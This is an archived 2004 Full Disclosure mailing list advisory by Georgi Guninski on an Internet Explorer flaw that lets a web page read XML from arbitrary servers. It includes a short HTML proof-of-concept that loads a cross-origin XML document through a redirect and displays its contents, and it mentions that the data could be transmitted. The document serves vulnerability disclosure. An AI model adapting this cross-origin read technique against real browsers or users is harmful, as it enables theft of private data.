Full Disclosure mailing list archives
Yet another IE aperture
From: Georgi Guninski <guninski () guninski com>
Date: Thu, 7 Oct 2004 12:27:58 +0300
Georgi Guninski security advisory #71, 2004 Yet another IE aperture Systems affected: tested on patched IE on win2k and xp Date: 7 October 2004 Legal Notice: This Advisory is Copyright (c) 2004 Georgi Guninski. You may not modify it and distribute it or distribute parts of it without the author's written permission - this especially applies to so called "vulnerabilities databases" and securityfocus, microsoft, cert and mitre. If you want to link to this content use the URL: http://www.guninski.com/where_do_you_want_billg_to_go_today_1.html Anything in this document may change without notice. Disclaimer: The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: By opening html in IE it is possible to read at least well formed xml from arbitrary servers. The info then may be transmitted. Details: Consider this: --------- <html> <script> function f() { alert(document.all.x1.XMLDocument.xml); } </script> <body onload="f()"> <script id="x1" language="xml" src="/cgi-bin/redir.pl"></script> <h1> Copyright Georgi Guninski <br /> Cannot be used in any database </h1> </body> </html> --------- redir.pl does a http redirect. Georgi Guninski http://www.guninski.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Yet another IE aperture Georgi Guninski (Oct 07)
- <Possible follow-ups>
- Re: Yet another IE aperture GreyMagic Security (Oct 08)
- Re: Yet another IE aperture Georgi Guninski (Oct 09)
- Re: Yet another IE aperture GreyMagic Security (Oct 09)
- Re: Re: Yet another IE aperture Christian (Oct 10)
- Re: Yet another IE aperture Georgi Guninski (Oct 09)
- Re: Yet another IE aperture Aviv Raff (Oct 09)